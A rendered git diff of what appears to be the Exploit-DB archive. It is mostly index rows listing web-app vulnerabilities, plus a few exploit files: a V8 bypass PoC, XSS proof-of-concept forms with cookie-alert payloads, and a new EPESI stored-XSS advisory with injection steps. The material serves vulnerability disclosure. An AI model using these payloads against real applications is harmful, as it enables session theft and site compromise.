28750,platforms/php/webapps/28750.txt,"osCommerce 2.2 - 'admin/orders_status.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28751,platforms/php/webapps/28751.txt,"osCommerce 2.2 - 'admin/products_attributes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28464,platforms/php/webapps/28464.txt,"VisualShapers EZContents 2.0.3 - Headeruserdata.php SQL Injection",2006-08-30,DarkFig,php,webapps,0
|
||||
28465,platforms/php/webapps/28465.txt,"VisualShapers EZContents 2.0.3 - Loginreq2.php Cross-Site Scripting",2006-08-30,DarkFig,php,webapps,0
|
||||
28466,platforms/php/webapps/28466.txt,"Learn.com - Learncenter.asp Cross-Site Scripting",2006-08-30,Crack_MaN,php,webapps,0
|
||||
|
|
@ -30702,20 +30705,20 @@ id,file,description,date,author,platform,type,port
|
|||
28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 - template.php Script Code Injection",2006-10-03,"James Bercegay",php,webapps,0
|
||||
28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection",2006-10-04,Dj_ReMix,php,webapps,0
|
||||
28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 - Calendar.asp Cross-Site Scripting",2006-10-27,MizoZ,asp,webapps,0
|
||||
28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - admin/banner_manager.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - admin/banner_statistics.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - admin/countries.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - admin/currencies.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - admin/languages.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - admin/manufacturers.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - admin/products_expected.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - admin/reviews.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - admin/specials.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - admin/stats_products_purchased.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - admin/stats_products_viewed.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - admin/tax_classes.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - admin/tax_rates.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - admin/zones.php page Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 - 'admin/banner_manager.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28744,platforms/php/webapps/28744.txt,"osCommerce 2.2 - 'admin/banner_statistics.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28745,platforms/php/webapps/28745.txt,"osCommerce 2.2 - 'admin/countries.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28746,platforms/php/webapps/28746.txt,"osCommerce 2.2 - 'admin/currencies.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28747,platforms/php/webapps/28747.txt,"osCommerce 2.2 - 'admin/languages.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28748,platforms/php/webapps/28748.txt,"osCommerce 2.2 - 'admin/manufacturers.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28752,platforms/php/webapps/28752.txt,"osCommerce 2.2 - 'admin/products_expected.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28753,platforms/php/webapps/28753.txt,"osCommerce 2.2 - 'admin/reviews.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28754,platforms/php/webapps/28754.txt,"osCommerce 2.2 - 'admin/specials.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28755,platforms/php/webapps/28755.txt,"osCommerce 2.2 - 'admin/stats_products_purchased.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28756,platforms/php/webapps/28756.txt,"osCommerce 2.2 - 'admin/stats_products_viewed.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28757,platforms/php/webapps/28757.txt,"osCommerce 2.2 - 'admin/tax_classes.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 - 'admin/tax_rates.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 - 'admin/zones.php' 'page' Parameter Cross-Site Scripting",2006-10-04,Lostmon,php,webapps,0
|
||||
28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x - 'index.php' Remote File Inclusion",2006-10-05,MoHaNdKo,php,webapps,0
|
||||
28762,platforms/asp/webapps/28762.txt,"Civica - Display.asp SQL Injection",2006-10-05,CodeXpLoder'tq,asp,webapps,0
|
||||
28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injections",2006-10-06,"Francesco Laurita",php,webapps,0
|
||||
|
|
@ -31079,7 +31082,7 @@ id,file,description,date,author,platform,type,port
|
|||
29328,platforms/php/webapps/29328.txt,"ImpressPages CMS 3.6 - Arbitrary File Deletion",2013-11-01,LiquidWorm,php,webapps,0
|
||||
29237,platforms/php/webapps/29237.txt,"cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting",2006-12-08,"Aria-Security Team",php,webapps,0
|
||||
29238,platforms/php/webapps/29238.txt,"cPanel Web Hosting Manager 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-12-08,"Aria-Security Team",php,webapps,0
|
||||
29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - hata.asp hata Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0
|
||||
29240,platforms/asp/webapps/29240.txt,"Cilem Haber Free Edition - 'hata.asp' 'hata' Parameter Cross-Site Scripting",2006-12-08,ShaFuck31,asp,webapps,0
|
||||
29241,platforms/asp/webapps/29241.txt,"MaviPortal - Arama.asp Cross-Site Scripting",2006-12-09,St@rExT,asp,webapps,0
|
||||
29242,platforms/php/webapps/29242.txt,"Messageriescripthp 2.0 - lire-avis.php aa Parameter SQL Injection",2006-12-09,Mr_KaLiMaN,php,webapps,0
|
||||
29243,platforms/php/webapps/29243.txt,"Messageriescripthp 2.0 - existepseudo.php pseudo Parameter Cross-Site Scripting",2006-12-09,Mr_KaLiMaN,php,webapps,0
|
||||
|
|
@ -31968,7 +31971,7 @@ id,file,description,date,author,platform,type,port
|
|||
30633,platforms/php/webapps/30633.txt,"Uebimiau Webmail 2.7.x - 'index.php' Cross-Site Scripting",2007-10-03,"Ivan Sanches",php,webapps,0
|
||||
30634,platforms/php/webapps/30634.txt,"Content Builder 0.7.5 - 'postComment.php' Remote File Inclusion",2007-10-03,"Mehrad Ansari Targhi",php,webapps,0
|
||||
30637,platforms/php/webapps/30637.js,"WordPress Plugin Google FeedBurner FeedSmith 2.2 - Cross-Site Request Forgery",2007-10-04,"David Kierznowski",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30638,platforms/php/webapps/30638.txt,"GForge 4.6/4.5/3.1 - 'Verify.php' Cross-Site Scripting",2007-10-04,"Jose Sanchez",php,webapps,0
|
||||
30968,platforms/php/webapps/30968.txt,"MODx 0.9.6.1 - 'htcmime.php' Source Code Information Disclosure",2008-01-02,"AmnPardaz Security Research Team",php,webapps,0
|
||||
30639,platforms/cgi/webapps/30639.txt,"Cart32 6.x - GetImage Arbitrary File Download",2007-10-04,"Paul Craig",cgi,webapps,0
|
||||
30640,platforms/php/webapps/30640.txt,"Stuffed Guys Stuffed Tracker - Multiple Cross-Site Scripting Vulnerabilities",2007-10-04,"Aria-Security Team",php,webapps,0
|
||||
|
|
@ -32082,11 +32085,11 @@ id,file,description,date,author,platform,type,port
|
|||
30822,platforms/php/webapps/30822.txt,"BEA AquaLogic Interaction 6.0/6.1 Plumtree Portal - Multiple Information Disclosure Vulnerabilities",2007-11-28,"Adrian Pastor",php,webapps,0
|
||||
30823,platforms/php/webapps/30823.txt,"bcoos 1.0.10 - 'ratephoto.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0
|
||||
30824,platforms/php/webapps/30824.txt,"bcoos 1.0.10 - 'ratelink.php' SQL Injection",2007-11-28,Lostmon,php,webapps,0
|
||||
30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/modules/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/admin/patch/index.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/install_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - upload/xax/ossigeno/admin/uninstall_module.php level Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30826,platforms/php/webapps/30826.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30827,platforms/php/webapps/30827.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/modules/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30828,platforms/php/webapps/30828.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/admin/patch/index.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30829,platforms/php/webapps/30829.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/install_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30830,platforms/php/webapps/30830.txt,"Ossigeno CMS 2.2_pre1 - 'upload/xax/ossigeno/admin/uninstall_module.php' 'level' Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30831,platforms/php/webapps/30831.txt,"Ossigeno CMS 2.2_pre1 - ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php ossigeno Parameter Remote File Inclusion",2007-11-30,ShAy6oOoN,php,webapps,0
|
||||
30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 - 'ratefile.php' SQL Injection",2007-11-30,Lostmon,php,webapps,0
|
||||
30841,platforms/asp/webapps/30841.txt,"Absolute News Manager .NET 5.1 - 'pages/default.aspx' 'template' Parameter Remote File Access",2007-12-04,"Adrian Pastor",asp,webapps,0
|
||||
|
|
@ -32985,7 +32988,7 @@ id,file,description,date,author,platform,type,port
|
|||
32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80
|
||||
32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80
|
||||
32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80
|
||||
32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
|
||||
32213,platforms/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80
|
||||
32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0
|
||||
32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0
|
||||
32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0
|
||||
|
|
@ -33045,7 +33048,7 @@ id,file,description,date,author,platform,type,port
|
|||
32300,platforms/asp/webapps/32300.txt,"Educe ASP Search Engine 1.5.6 - 'search.asp' Cross-Site Scripting",2008-08-26,JoCk3r,asp,webapps,0
|
||||
32302,platforms/php/webapps/32302.txt,"AbleSpace 1.0 - 'adv_cat.php' Cross-Site Scripting",2008-08-27,"Bug Researchers Group",php,webapps,0
|
||||
32306,platforms/php/webapps/32306.txt,"dotProject 2.1.2 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2008-08-29,C1c4Tr1Z,php,webapps,0
|
||||
32307,platforms/php/webapps/32307.txt,"vtiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0
|
||||
32307,platforms/php/webapps/32307.txt,"vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0
|
||||
32308,platforms/php/webapps/32308.txt,"GenPortal - 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,php,webapps,0
|
||||
32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",php,webapps,0
|
||||
32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Parameter Cross-Site Scripting",2008-09-02,Am!r,php,webapps,0
|
||||
|
|
@ -34455,7 +34458,7 @@ id,file,description,date,author,platform,type,port
|
|||
34797,platforms/php/webapps/34797.txt,"Surgemail SurgeWeb 4.3e - Cross-Site Scripting",2010-10-04,"Kerem Kocaer",php,webapps,0
|
||||
34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 - 'car' Parameter SQL Injection",2010-09-27,RoAd_KiLlEr,php,webapps,0
|
||||
34781,platforms/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
|
||||
34798,platforms/php/webapps/34798.txt,"ITS SCADA 'Username' - SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0
|
||||
34798,platforms/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0
|
||||
34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0
|
||||
34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
|
||||
34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
|
||||
|
|
@ -34917,10 +34920,10 @@ id,file,description,date,author,platform,type,port
|
|||
35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusion",2011-04-04,KedAns-Dz,php,webapps,0
|
||||
35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",php,webapps,0
|
||||
35572,platforms/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",php,webapps,0
|
||||
35574,platforms/php/webapps/35574.txt,"vtiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0
|
||||
35574,platforms/php/webapps/35574.txt,"vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion",2011-04-08,"John Leitch",php,webapps,0
|
||||
35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 - 'cms.php' Remote File Inclusion",2011-04-08,KedAns-Dz,php,webapps,0
|
||||
35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0
|
||||
35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
|
||||
35577,platforms/php/webapps/35577.txt,"vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
|
||||
35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0
|
||||
35579,platforms/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
|
||||
35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
|
||||
|
|
@ -35311,9 +35314,9 @@ id,file,description,date,author,platform,type,port
|
|||
36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0
|
||||
36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0
|
||||
36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80
|
||||
36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
|
||||
36203,platforms/php/webapps/36203.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36204,platforms/php/webapps/36204.txt,"vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0
|
||||
36208,platforms/php/webapps/36208.txt,"vTiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0
|
||||
36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0
|
||||
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0
|
||||
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0
|
||||
|
|
@ -35346,7 +35349,7 @@ id,file,description,date,author,platform,type,port
|
|||
36252,platforms/php/webapps/36252.txt,"e107 0.7.24 - 'cmd' Parameter Remote Command Execution",2011-10-24,"Matt Bergin",php,webapps,0
|
||||
36253,platforms/php/webapps/36253.txt,"InverseFlow 2.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-24,"Amir Expl0its",php,webapps,0
|
||||
36254,platforms/php/webapps/36254.txt,"Alsbtain Bulletin 1.5/1.6 - Multiple Local File Inclusion",2011-10-25,"Null H4ck3r",php,webapps,0
|
||||
36255,platforms/php/webapps/36255.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0
|
||||
36255,platforms/php/webapps/36255.txt,"vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,LiquidWorm,php,webapps,0
|
||||
36259,platforms/php/webapps/36259.txt,"eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections",2011-10-28,"Vulnerability Research Laboratory",php,webapps,0
|
||||
36265,platforms/php/webapps/36265.txt,"BEdita CMS 3.5.0 - Multiple Vulnerabilities",2015-03-04,"Edric Teo",php,webapps,80
|
||||
36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0
|
||||
|
|
@ -36617,7 +36620,7 @@ id,file,description,date,author,platform,type,port
|
|||
38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
|
||||
38342,platforms/ios/webapps/38342.txt,"My.WiFi USB Drive 1.0 iOS - File Inclusion",2015-09-28,Vulnerability-Lab,ios,webapps,8080
|
||||
38343,platforms/ios/webapps/38343.txt,"Photos in Wifi 1.0.1 iOS - Arbitrary File Upload",2015-09-28,Vulnerability-Lab,ios,webapps,0
|
||||
38345,platforms/php/webapps/38345.txt,"Vtiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80
|
||||
38345,platforms/php/webapps/38345.txt,"vTiger CRM 6.3.0 - Authenticated Remote Code Execution",2015-09-28,"Benjamin Daniel Mussler",php,webapps,80
|
||||
38350,platforms/hardware/webapps/38350.txt,"Western Digital My Cloud 04.01.03-421/04.01.04-422 - Command Injection",2015-09-29,absane,hardware,webapps,0
|
||||
38351,platforms/asp/webapps/38351.txt,"Kaseya Virtual System Administrator (VSA) - Multiple Vulnerabilities (2)",2015-09-29,"Pedro Ribeiro",asp,webapps,0
|
||||
38354,platforms/php/webapps/38354.txt,"Plogger - Multiple Input Validation Vulnerabilities",2013-03-02,"Saadat Ullah",php,webapps,0
|
||||
|
|
@ -38647,3 +38650,6 @@ id,file,description,date,author,platform,type,port
|
|||
42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
|
||||
42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
|
||||
42947,platforms/hardware/webapps/42947.txt,"Fiberhome AN5506-04-F - Command Injection",2017-10-03,Tauco,hardware,webapps,0
|
||||
42950,platforms/php/webapps/42950.txt,"EPESI 1.8.2 rev20170830 - Cross-Site Scripting",2017-10-03,"Zeeshan Shaikh",php,webapps,0
|
||||
42953,platforms/windows/webapps/42953.txt,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-09-20,xxlegend,windows,webapps,0
|
||||
42954,platforms/php/webapps/42954.py,"ClipBucket 2.8.3 - Remote Code Execution",2017-10-04,"Meisam Monsef",php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -1,7 +1,8 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/168/info
|
||||
|
||||
A vulnerability in FreeBSD's UNIX-domain protocol implementation of file descriptor passing can cause the kernel to panic.
|
||||
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
|
|
@ -1,3 +1,4 @@
|
|||
/*
|
||||
source: http://www.securityfocus.com/bid/1895/info
|
||||
|
||||
top is a program used to display system usage statistics in real time written by GoupSys Consulting but shipped by default as a core component with many operating systems. On BSD systems, top is installed setgid kmem so that it may read process information from kernel memory if executed by a user who does not have that privilege.
|
||||
|
|
@ -7,6 +8,7 @@ top contains a format-string vulnerability that may lead to a compromise of effe
|
|||
If a malicious user gains egid kmem, vital information can be read from the kernel memory that may lead to a further elevation of privileges (most certainly root eventually).
|
||||
|
||||
The versions of top that ships with FreeBSD prior to 4.2 are known to be vulnerable. It is likely that other systems are vulnerable (though none are confirmed yet).
|
||||
*/
|
||||
|
||||
/*
|
||||
* freebsd x86 top exploit
|
||||
|
|
|
|||
20
platforms/multiple/dos/42955.html
Executable file
20
platforms/multiple/dos/42955.html
Executable file
|
|
@ -0,0 +1,20 @@
|
|||
<!--
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1319
|
||||
|
||||
The following PoC bypasses the fix for the issue 1263 (https://bugs.chromium.org/p/project-zero/issues/detail?id=1263)
|
||||
|
||||
PoC:
|
||||
-->
|
||||
|
||||
function f() {
|
||||
let o = {};
|
||||
for (let i in {xx: 0}) {
|
||||
for (i of [0]) {
|
||||
|
||||
}
|
||||
|
||||
print(o[i]);
|
||||
}
|
||||
}
|
||||
|
||||
f();
|
||||
|
|
@ -28,7 +28,7 @@ The following PoC (Proof of Concept) demonstrates the vulnerability:
|
|||
|
||||
|
||||
<form action="http://[host]/admin/index.php?action=add_template&id=themes" method="post">
|
||||
<input type="hidden" name="themes_editor" value='</textarea><script>alert(document.cookie);</script>' />
|
||||
<input type="hidden" name="themes_editor" value='</textarea><script>alert(document.cookie);</script>' />
|
||||
<input type="hidden" name="themes_editor_name" value='' />
|
||||
<input type="hidden" name="add_template" value='' />
|
||||
<input type="submit" id="btn">
|
||||
|
|
|
|||
|
|
@ -1498,7 +1498,7 @@ Preconditions: none
|
|||
Test:
|
||||
|
||||
http://pmbt/modrules.php?act=newsect&
|
||||
res[text]=</textarea><script>alert(123);</script>
|
||||
res[text]=</textarea><script>alert(123);</script>
|
||||
|
||||
|
||||
###############################################################################
|
||||
|
|
|
|||
50
platforms/php/webapps/42950.txt
Executable file
50
platforms/php/webapps/42950.txt
Executable file
|
|
@ -0,0 +1,50 @@
|
|||
# Exploit Title: Multiple Stored XSS in EPESI
|
||||
# Date: 10/03/2017
|
||||
# Exploit Author: Zeeshan Shaikh
|
||||
# Vendor Homepage: http://epe.si/
|
||||
# Software Link: http://epe.si/download/
|
||||
# Version: 1.8.2 rev20170830
|
||||
# CVE : CVE-2017-14712 to CVE-2017-14717
|
||||
# Category: webapps
|
||||
|
||||
|
||||
XSS 1 (Tasks - Title)
|
||||
Steps to recreate:
|
||||
1. Home->Tasks->add new
|
||||
2. Enter title as "MYTITLE" and fill required details but don't click save
|
||||
3. Start interceptor and intercept request
|
||||
4. click save
|
||||
5. Now replace MYTITLE with "<i onclick=alert(1)>alertme</i>"(without
|
||||
quotes)
|
||||
6. Home->click on alertme
|
||||
|
||||
XSS 2 (Tasks - Description)
|
||||
Steps to recreate:
|
||||
1. Create a new task and fill description as "MYDESC" but don't click on
|
||||
save
|
||||
2. Start intercepting request and then click save on browser
|
||||
3. Now replace MYDESC with "<script>alert(1)</script>"
|
||||
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
|
||||
|
||||
XSS 3 (Tasks/Phonecall - Notes - Title)
|
||||
Steps to recreate:
|
||||
1. Home->Tasks/PhoneCall->Notes->add new
|
||||
2. Steps same as XSS 1
|
||||
3. Click on alertme in notes section
|
||||
|
||||
XSS 4 (Tasks - Alerts - Title)
|
||||
Steps to recreate:
|
||||
1. Home->Tasks->Notes->add new
|
||||
2. Steps same as XSS 1
|
||||
3. Click on alertme in alerts section
|
||||
|
||||
XSS 5 (Phonecalls - Subject)
|
||||
Steps to recreate:
|
||||
1. Create a new phonecall and fill subject as "MYSUB" but don't click on
|
||||
save
|
||||
2. Start intercepting request and then click save on browser
|
||||
3. Now replace MYSUB with "<script>alert(1)</script>"
|
||||
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
|
||||
|
||||
XSS 6 (Phonecalls - Description)
|
||||
Same as XSS 5
|
||||
61
platforms/php/webapps/42954.py
Executable file
61
platforms/php/webapps/42954.py
Executable file
|
|
@ -0,0 +1,61 @@
|
|||
